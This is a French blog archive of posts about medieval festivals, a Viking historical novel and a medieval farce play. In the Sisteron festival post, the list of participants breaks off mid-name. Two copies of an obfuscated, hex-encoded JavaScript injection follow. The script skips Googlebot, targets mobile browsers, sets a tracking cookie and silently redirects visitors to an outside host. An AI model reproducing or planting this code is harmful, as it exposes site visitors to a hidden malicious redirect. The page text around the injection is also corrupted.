Archive pour la catégorie ‘Culture’

Montfort à la Conquête de l’Angleterre

mardi 5 juillet 2016

Dans le cadre du 950ème Anniversaire de la Bataille d’Hastings, Montfort Culture et Patrimoine présente « Montfort à la Conquête de l’Angleterre» les 17 et 18 septembre au Château Médiéval de Montfort sur Risle (Eure)

Samedi soir 17 septembre à 19h00
Diner avec animation musicale médiévale avec le groupe CELESTIAES
Soirée cinéma à 21h00. Diffusion du film « La jeunesse de Guillaume le Conquérant » de Fabien Drugeon. Sur réservation au cout de 2€ la place. Réservations au 02.32.56.35.76 (Office de Tourisme)
Dimanche 18 septembre 2016.
De 9h00 à 19h00, Animations historiques à destination de tous les publics proposées en toute gratuité dans la basse cour du château :
– Campement médiéval de reconstitution historique présentant le mode vie et de nombreuses animations à destination des enfants (adoubement de chevalier, jeux en bois, jeux d’adresse, tir à l’arc)
– Compagnies de combattants Normands Vikings et Saxons proposant des combats en mêlée illustrant La Mesnie d’Hugues de Montfort qui accompagnait Guillaume lors de la bataille d’Hastings
Les combats chorégraphiés de soldats seront accompagnés de chevaliers haranguant les forces ennemies du haut de leurs destriers.
– Joutes équestres A l’issue de la bataille, des joutes à cheval verront s’affronter de nobles chevaliers combattant en lice pour l’honneur d’une gente dame !
– Spectacle «les Fables de Marie de France» .Danses d’inspiration médiévale et marionnettes pour tous âges.
– Conteuse en costume période ducale qui présentera contes et fabliaux à destination des enfants.
– Marché artisanal et produits régionaux, métiers anciens: forge, Maréchal ferrant, Tailleur de pierre
– Montfort Culture et Patrimoine proposera des visites commentées du site et vous contera l’histoire de la dynastie des Montfort et les techniques militaires en usage.
– La maquette du château vous sera présentée autour d’une exposition de toiles relatant la vie de Guillaume
– Le groupe Celestiaes composé de quatre musiciens et accompagné de deux jongleurs vous accompagnera tout au long de la journée et vous apportera joie et bonne humeur.

Buvette / restauration / sanitaires / stationnement
Horaires :
Samedi 17 Septembre de 18h30 à 23h00 (réservation pour la diffusion du film)
Dimanche 18 Septembre de 9h00 à 19h00

Infos : 0232563576 / site web : www.amcp27.fr

Fête Médiévale / Journées du Patrimoine au Château de Montfort sur Risle le 20 septembre

dimanche 28 juin 2015

Dans le cadre des Journées du Patrimoine qui se tiendront le Dimanche 20 septembre prochain, l’association Montfort Culture et Patrimoine vous donne rendez-vous au château médiéval de Montfort sur Risle pour une journée de festivités.

Sur ce site magnifique des XIe et XIIe, inscrit à l’inventaire supplémentaire des monuments historiques, son passé glorieux vous sera conté alors que le vicomte Hugues II de Montfort accompagnait Guillaume le Conquérant lors de la bataille d’Hastings. Un ensemble d’animations à destination de tous les publics vous est proposé en toute gratuité dans la basse cour du château.

– Un campement médiéval normand des XIe et XIIe prendra place au sein de la basse cour.
Les troupes : La Mesnie des Chevaliers de St Georges, les Compagnons pour Hastings et les Klanen Av Byggvir vous présenteront un campement médiéval comme il s’en tenait aux Xe, XI e et XIIe siècles au gré des pérégrinations des châtelains et hommes d’armes.

– La Mesnie des Chevaliers de St Georges composée de quinze personnes présentera un camp médiéval et des activités didactiques et pédagogiques à destination du public.
Hormis les traditionnels présentations de la vie de camp, de l’armement et de la cuisine médiévale, seront proposées des initiations à l’escrime avec du matériel adapté pour les enfants et différents jeux interactifs.
Des machines de siège du XIIe reproduites avec fidélité tel un trébuchet et une baliste seront présentés et des démonstrations de tirs attenants seront proposés en situation.
Les traditionnels combats de soldats chorégraphiés en individuel ou en mêlée prendront place dans la basse cour alors que des joutes à cheval feront s’affronter de nobles chevaliers combattant en lice.

– Le groupe Jàdys deux jeunes femmes et un percussionniste qui interpréteront des chants venus des quatre coins du monde accompagnés d’instruments de musiques tels que guitare-luth et vièle à archet. Chant séfarades médiévaux, orientaux, de l’an mille, le tout soutenu par le tintement des grelots. Ces ménestrels vous feront voyager à travers le temps

– Les Compagnons pour Hastings proposeront divers ateliers d’artisanat parmi lesquels la confection de cottes de mailles, la fabrication de boucliers et la fabrication de l’Hypocras.
Différentes démonstrations de passes d’Armes seront illustrées et le soldat Normand de l’an 1000 sera présenté dans ses différentes composantes.
L’Archerie et les tirs à l’Arbalète feront l’objet de démonstrations à destination du public pour les adultes et les enfants.

– Les Klanen Av Byggvir présenteront une compagnie Viking de Xe et XIe siècles, ancêtres des Normands qui s’établiront dans le Duché dès les Xe. Seront présentés des travaux d’artisanat : forge, textile, broderie. La mythologie nordique sera évoquée alors que le marché aux esclaves ravira les enfants. Les farouches guerriers Vikings équipés de leur armement proposeront des techniques de combats.

– Un marché artisanal complètera les animations et la diversité de produits régionaux ou les confections particulières issues de l’artisanat susciteront l’engouement de la plupart d’entre vous.
Les enfants auront également la possibilité de parcourir le site au gré de ballades à dos d’âne pour leur plus grand plaisir.

– Des vieux métiers seront présentés tel qu’un atelier de vannerie et confection de paniers, un tour de potier et un maréchal ferrant forgeron , Alexandre Fussien, qui présentera pour le plaisir du public des démonstrations de forge et de ferrage de chevaux percherons.

– L’association Montfort Culture et Patrimoine donnera des visites commentées du site et vous contera l’épopée de la dynastie des Montfort ainsi que l’architecture du monument et les techniques de siège en usage au XIe et XIIe.
Nous vous présenterons les travaux de mise en conservation des maçonneries et le sondage archéologique réalisés par l’association Chantier Histoire et Architecture Médiévale lors des trois dernières campagnes et vous informerons des différents projets attenants dès l’année prochaine.

– La Maquette du château médiéval, réplique effectuée scrupuleusement d’après les plans et recherches archéologiques sera présentée et expliquée au public par Gilles Mauger qui évoquera par ailleurs le mode de construction des édifices militaires et religieux de style roman.

Soucieux de vous accueillir dans les meilleures conditions, une buvette et une petite restauration à base de crêpes complètes ou sucrées vous seront proposées afin de passer la journée en famille. Les sanitaires et le stationnement de votre véhicule à proximité du site complèteront le confort de votre accueil en toute gratuité lors de cette journée.

Horaires : Dimanche 20 Septembre de 9h00 à 19h00

Informations au : 0685618379 ou 0232563576 / site web : www.amcp27.fr

médiévales Montfort

médiévales Montfort

médiévales Montfort

médiévales Montfort

Un Noël original à Provins

vendredi 31 octobre 2014


Venez découvrir les nombreuses animations organisées à l’occasion des fêtes de Noël  du 13 au 14 décembre.

  • Le marché médiéval de Noël sur la Place du Châtel

Gentes dames et damoiseaux, la cité médiévale de Provins vous invite à redécouvrir la ville haute à occasion de son 5 ème marché médiéval de Noël.Vous rencontrerez une quarantaine d’artisans démonstrateurs qui vous feront voyager à travers le temps, ainsi que de nombreuses animations animé par des troubadours, jongleurs pour le bonheur de toute la famille. .. Retrouvez également le marché nocturne, avec un bal médiéval, des illuminations à la bougie et des animateurs de feu qui transformeront la place du Châtel en un lieu féerique !

  • L’école des princesses et chevaliers

Nouveauté 2014 : à quelques pas de la place, dans la cour de l’école, princesses et chevaliers pourront se défier aux jeux en bois, tir à l’arc, faire un tour de poney…

  • Spectacle dansant

Retrouvez Bertin, Bertille, Père Conil et Dame Oiselle Sidonie nos saltimbanques et ménestrels dans la salle haute de la Grange aux Dîmes, pour partager avec eux un joyeux moment autour d’une soupe à la mode médiévale.

  • Une Crèche vivante au coeur de la cité

Elle retrace la vie de Saint François d’Assise qui accompagnait son père, riche drapier italien, aux célèbres Foires de Provins et qui fut le premier à reconstituer une représentation de la nativité. La seconde partie du spectacle nous ramène aux fondements de l’ère chrétienne. C’est une crèche pleine de ferveur, de foi et de poésie qui va plaire à toute la famille !

  • La traditionnel village de Noël

Un marché artisanal où près de quarante chalets proposent vin chaud, thé de Noël, spécialités gastronomiques, jouets en bois, bijoux, objets de décoration… Une patinoire de 200 m², l’attraction hivernal par excellence ainsi que de nombreuses animations dont le traditionnel chalet et calèche du Père Noël, contes, maquillage..

  • Mystère et contes dans les souterrains

Les souterrains seront le théâtre de promenades contées pour faire découvrir aux petits et aux grands de nouveaux moments de magie, d’évasion. Un voyage hors du temps!

  • Noël à toute vapeur!

Laissez vous embarquez par le Père Noël en locomotive vapeur suivie de sa rame historique pour un véritable voyage dans le temps! Le train du Père Noël circulera entre la Rotonde de Longueville et la gare de Provins ! Une excellente occasion pour découvrir la rotonde ferroviaire, abritant une importante collection de locomotives à vapeur, de voiture et de wagons représentant un siècle d’évolution du chemin de fer.

 

Bien entendu, pendant le week-end, les monuments incontournables de Provins restent ouvert à tous : La Tour César, Grange aux Dîmes, souterrains, musée de Provins et du Provinois.

 

Renseignements auprès de l’Office de tourisme de Provins au 01.64.60.26.26 ou sur www.provins.net

 Pour les contes dans les souterrains et le spectacle dansant réservation obligatoire auprès de GTS 06.50.30.43.67 et pour le train à vapeur, bulletin d’inscription à télécharger sur www.ajecta.org.

 

ANIMATIONS MEDIEVALES LE 21 SEPTEMBRE AU CHATEAU DE MONTFORT SUR RISLE

lundi 11 août 2014
Montfort Médiévales

Montfort Médiévales

Dans le cadre des Journées du Patrimoine qui se tiendront le 21 septembre prochain, l’association Montfort Culture et Patrimoine vous donne rendez-vous au château médiéval de Montfort sur Risle pour une journée de festivités.

Sur ce site magnifique des XIe et XIIe, inscrit à l’inventaire supplémentaire des monuments historiques, son passé glorieux vous sera conté alors que le vicomte Hugues II de Montfort accompagnait Guillaume le Conquérant lors de la bataille d’Hastings. Un ensemble d’animations à destination de tous les publics vous est proposé en toute gratuité dans la basse cour du château.

– Un campement médiéval normand des XIe et XIIe prendra place au sein de la basse cour.
Les troupes : La Mesnie des Chevaliers de St Georges, les Compagnons pour Hastings et les Compaings d’Esculape vous présenteront un campement médiéval comme il s’en tenait aux Xe XI e et XIIe siècles au gré des pérégrinations des châtelains et hommes d’armes.

– La Mesnie des Chevaliers de St Georges composée de quinze personnes présentera un camp médiéval et des activités didactiques et pédagogiques à destination du public.
Hormis les traditionnels présentations de la vie de camp, de l’armement et de la cuisine médiévale, seront proposées des initiations à l’escrime avec du matériel adapté pour les enfants et différents jeux interactifs.
Des machines de siège du XIIe reproduites avec fidélité tel un trébuchet et une baliste seront présentés et des démonstrations de tirs attenants seront proposés en situation.
Les traditionnels combats de soldats chorégraphiés en individuel ou en mêlée prendront place dans la basse cour alors que des joutes à cheval feront s’affronter de nobles chevaliers combattant en lice.

– Le groupe Meghan : Deux Ménestrels avisés de musique médiévale et celtique présenteront plusieurs œuvres musicales datant du Moyen-âge et animeront en musique le site du château dans sa globalité.

– Les Compagnons pour Hastings proposeront divers ateliers d’artisanat parmi lesquels la confection de cottes de mailles, la fabrication de boucliers et la fabrication de l’Hypocras.
Différentes démonstrations de passes d’Armes seront illustrées et le soldat Normand de l’an 1000 sera présenté dans ses différentes composantes.
L’Archerie et les tirs à l’Arbalète feront l’objet de démonstrations à destination du public pour les adultes et les enfants.

– Les Compaings d’Esculape présenteront une compagnie Viking du Xe siècle, ancêtres des Normands qui s’établiront dans le Duché durant les XIe et XIIe siècles. Seront présentés des travaux d’artisanat, la technique du feu primitif, de farouches guerriers et leur armement, et des techniques de combats.

– Un marché artisanal complètera les animations et la diversité de produits régionaux ou les confections particulières issues de l’artisanat susciteront l’engouement de la plupart d’entre vous.
Les enfants auront également la possibilité de parcourir le site au gré de ballades à dos d’âne pour leur plus grand plaisir.

– Des vieux métiers seront présentés tel qu’un atelier de vannerie et confection de paniers, un tour de potier et un maréchal ferrant forgeron , Alexandre Fussien, qui présentera pour le plaisir du public des démonstrations de forge et de ferrage de chevaux percherons.

– Un spectacle de Marionnettes à destination des enfants intitulé : « Mathilde l’Impératrice et la guerre pour la couronne d’Angleterre » sera proposé par la troupe des comédiens de l’Abbaye de Mortemer qui manipulent 25 marionnettes à fil. Mathilde fille d’Henri Beauclerc et grand-mère de Richard Cœur de Lion évoque l’épisode du début des opérations militaires lors de la succession du Duché de Normandie en 1135.

– L’association Montfort Culture et Patrimoine donnera des visites commentées du site et vous contera l’histoire de la dynastie des Montfort ainsi que l’architecture du monument et les techniques de siège en usage au XIe et XIIe.
Nous vous présenterons les travaux de mise en conservation des maçonneries et le sondage archéologique réalisés par l’association Chantier Histoire et Architecture Médiévale lors des trois dernières campagnes et vous informerons des différents projets attenants pour les années à venir.
– Plusieurs conférences alterneront avec les visites commentées du site.
Au programme : Gilles Mauger racontera la langue Normande et ses origines au travers de la période de la Normandie Ducale. Gilles évoquera également le mode de construction des édifices religieux de style roman.

Soucieux de vous accueillir dans les meilleures conditions, une buvette et une petite restauration à base de crêpes complètes ou sucrées vous seront proposées afin de passer la journée en famille. Les sanitaires et le stationnement de votre véhicule à proximité du site complèteront le confort de votre accueil en toute gratuité lors de cette journée.

Horaires : Dimanche 21 Septembre de 9h00 à 19h00

Informations au : 0685618379 ou 0232563576 / site web : www.amcp27.fr

Festival médiéval « Le passage du fort »

mardi 29 juillet 2014

Festival médiéval

Les 23 et 24 août offrez-vous un passage dans le temps à Sisteron.Venez découvrir en famille et en costume médiéval la 5ème édition du Passage du fort. La ville, la Citadelle, les commerçants, les vitrines sont aux couleurs du moyen âge.

Les restaurateurs vous proposent des menus médiévaux

Pour ouvrir ce festival, du 19 au 23 août une exposition dans le hall de la mairie. Jean-Luc CHARRIGNON atelier « le Bois et le fer proposera une animation sur la forge au moyen âge.
Cette exposition présentera la serrurerie, l’art de la table, la fabrication de pointes de flèches au XIIème siècle (entrée gratuite – 10 à 19h00)

Deux journées de fête : le samedi 23 dans la ville et dimanche 24 dans la Citadelle.
L’animation est permanente. Saltimbanques, échassiers, cracheur de feu, fabliaux, musiques, contes… Artisanat, et métiers disparus : haubergier, enlumineur, forgeron. Un saintier réalisera les étapes de fabrication d’une cloche (troussage du moule, coulée et démoulage du battant). Explications sur l’art campanaire au public.
Concert et présentation d’instruments de musique à la cathédrale le samedi
Cavalcades Spectacle de feu Bal médiéval
Passage dans le temps pour la durée d’un week-end, dames et chevaliers, troubadours et hommes d’armes feront tout pour vous divertir
Manifestation «labellisée Qualité» par la Fédération Française des Fêtes et Spectacles Historiques à laquelle nous adhérons depuis 2000. Une Démarche Qualité dans laquelle nous sommes engagés depuis 2006. Ce label récompense les efforts de l’association, qui portent à la fois sur la mesure de la satisfaction des visiteurs de la fête et sur la sensibilisation aux bonnes pratiques des bénévoles de la fête au travers de la signature d’une charte.

Entré concert (samedi 23)
Moins de 12 ans : Gratuit
Groupes (+de 10Pers) & adhérents F.F.F.S.H : 8E
Adultes : 10E

Entré Citadelle (dimanche 24)
Moins de 8ans : Gratuit
Jusqu’à 16 ans : 6E
Groupes (+de 10 Pers.) & adhérents F.F.F.S.H & Personnes costumées: 8E
Adultes : 10E
Accès (gratuit) handicapés moteur, uniquement sur deuxième et troisième terrasse. Accompagnateurs prendre contact à l’accueil.

 

Les intervenants de cette belle fête :
Les Goliards de Provence, Animals & Co, Marymorgan WITCH et l’Ordres des corbeaux, Jean-Luc Charrignon atelier « Le bois et le fer », Cie les Vaguabondes, Le Prince des Dombes, Stéphane HUGUET dit « Sanguin le Heaumier », Les cavaliers des Dunes, Association La Terra de Miramaris, Association Théâtre en liberté, Les Gueux de Volonne, Association L’Ost des temps Jadis, Association L’Ost de Roy, Association la Geste des Terres Hautes, Eric Klee Atelier de sculptures et de fonderie  L’Esquielle, Association Entre Deux Airs Les BMS, VOLPES Patrick, Chloé ALLvar _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Un nouveau jeu parti dans le Jardin Courtois virtuel de Fortuna.

dimanche 29 décembre 2013

Allez donc faire un tour dans le Jardin Courtois
cerfBlanc

Publication roman historique : le siège de Paris par les vikings

vendredi 29 mars 2013

Joelle Delacroix : Les Vikings sur la Seine et Le siège de paris par les vikings

Je suis passionnée du haut moyen age et des vikings. ma passion m’a menée à m’intéresser à une période particulière de cette époque, celle des derniers Carolingiens. La lecture des Chroniques du siège de Paris par les Vikings, du Moine Abbon, publiées aux Belles Lettres, m’a fait découvrir un passage méconnu de notre histoire et de Paris plus particulièrement. Mes recherches sur cette période ont abouti à la rédaction d’un roman Historique que je viens de publier aux éditions l’harmattan.

Ce roman historique a pour cadre le siège que subit la ville de Paris en 885-887, siège mené par les Vikings, en majorité des Danois auxquels auraient été mêlés quelques Norvégiens. La ville les avait déjà vus quatre fois : en 845, 856, 861 et 865, les faubourgs des rives droite et gauche avaient été mis à sac. Pourtant, en cette année 885, les Danois ne se contentèrent pas des faubourgs au reste désertés. Cherchant à gagner l’est de la France et le riche royaume de Bourgogne, désirant assurer leurs arrières pour une retraite rapide, ils réclamèrent qu’on leur livre la ville. Les Parisiens, conscients de l’importance stratégique de Paris et des conséquences désastreuses que pourrait avoir leur capitulation, refusèrent. Les Danois mirent alors le siège devant la ville : il dura un an.

C’est ce long siège de Paris qui constitue le cadre de notre histoire : il commence en novembre 885 pour se terminer effectivement au mois de novembre 886, mais les Danois réapparaîtront au mois de mai 887 et marauderont autour de la ville jusqu’en octobre 887.

La ville est défendue par son comte Eudes, fils de Robert le Fort, comte de Tours, d’Orléans, Angers, Le Mans, Blois, abbé de Marmoutier et Saint-Martin de Tours, mort en 866 à Brissarthe en affrontant des Danois menés par le chef Hásteinn. Aux côtés du comte de la ville, se trouvent son frère cadet Robert, l’évêque de la ville, Gauzlin, Eblès, le neveu de l’évêque et quelques autres princes.

Notre récit, en ce qui concerne ses événements principaux, s’appuie sur les chroniques de l’époque et en particulier sur celle que le moine Fleury de Abbon[1], témoin du siège de Paris, rédigea en 888-889. Notre histoire raconte le siège de Paris par les Danois que mène Siegfried, l’ascension d’Eudes, mais également l’hésitante conversion et la délicate insertion au milieu des Francs d’un jeune danois – þorgils – fait prisonnier par le comte.
Jean Renaud, auteur de nombreux livres sur les Vikings, a relu cet ouvrage et l’a préfacé.

SIÈGE DE PARIS PAR LES VIKINGS (LE)
Tome 1 : Les Vikings sur la Seine
Joelle Delacroix
Roman historique
Editions l’Harmattan
ISBN : 978-2-336-00828-8
février 2013
 
SIÈGE DE PARIS PAR LES VIKINGS (LE)
Tome 2 : Le choix de Porgils

Joelle Delacroix
Roman historique
Editions l’Harmattan
ISBN : 978-2-336-00829-5
février 2013

[1]De bello Parisiaco (le siège de Paris par les Normands), éd. et trad. H. Waquet, 1964, Les Belles Lettres

Les Paysans de la Farce d’après des farces du Moyen Age

jeudi 24 janvier 2013

Les Paysans de la Farce d’après des farces du Moyen Age, du 6 au 23 février 2013, à 20 h et dimanche à 16 h, au Théâtre de l’Iris. Durée environ 1 h 45, à partir de 12 ans.

Comment vendre avantageusement ses œufs au marché, comment donner une leçon concrète avec illustration pédagogique au noble qui use copieusement de votre femme, comment faire croire à notre épouse dévote qu’on n’a pas fait un enfant à la servante et aussi comment entendre la voix de Dieu qui va vous révéler miraculeusement vos origines…

Dernier volet d’une trilogie sur les paysans, après Les Tribunaux rustiques de Maupassant etLe Testament du Père Leleu de Roger Martin du Gard, le spectacle nous amène à découvrir le monde insolent et malicieux du Moyen-Âge, avec son langage cru, ses personnages dessinés à gros traits, mais profondément signifiants, relevant plus de l’archétype que de la caricature et dont l’imaginaire libre et impétueux s’amuse de la pauvre condition humaine. Il y a toujours une solution aux situations inextricables dans lesquelles sont engoncés les protagonistes, mais au final, c’est toujours celle que l’on attend le moins qui vient nous surprendre et nous ravir.C’est un spectacle de bateleur hirsute, un moment de foire et de réjouissance sans frein qui éclate au son de la trompette comme la promesse de tous les possibles.

LA COMPAGNIE DE L’IRIS

  • Conception Philippe Clément
  • Mise en scène Caroline Boisson
  • Avec Philippe Clément, Emilie Guiguen, Didier Vidal (comédiens) Radoslaw Klukowski (comédien / musicien)
  • Musique Radoslaw Klukowski
  • Scénographie Elisabeth Clément
  • Lumière Elisabeth Clément et Benjamin Wolff
  • Costumes Eric Chambon
  • En co-production avec le Théâtre des Pénitents de Montbrison.
  • En co-production avec le Théâtre des Pénitents Graphisme : Studio Shifumi.

Théâtre de l’Iris

  • 331, rue Francis de Pressensé
  • 69100 Villeurbanne

Informations et réservations au 04 78 68 86 49 ou information@theatredeliris.fr

Entre Hermann le Chérusque et le moyen âge allemand.

mercredi 21 septembre 2011

La face du Moyen Âge s’est jouée avant celui ci, en plein milieu de l’Empire Romain. Si l’Europe de l’Ouest et particulièrement la France se développa de façon plutôt centralisée, elle le doit bien sûr à l’autorité de quelques
grands rois, Louis XI, Philippe le Bel, mais aussi à son passé de colonie romaine florissante sous la pax romana.

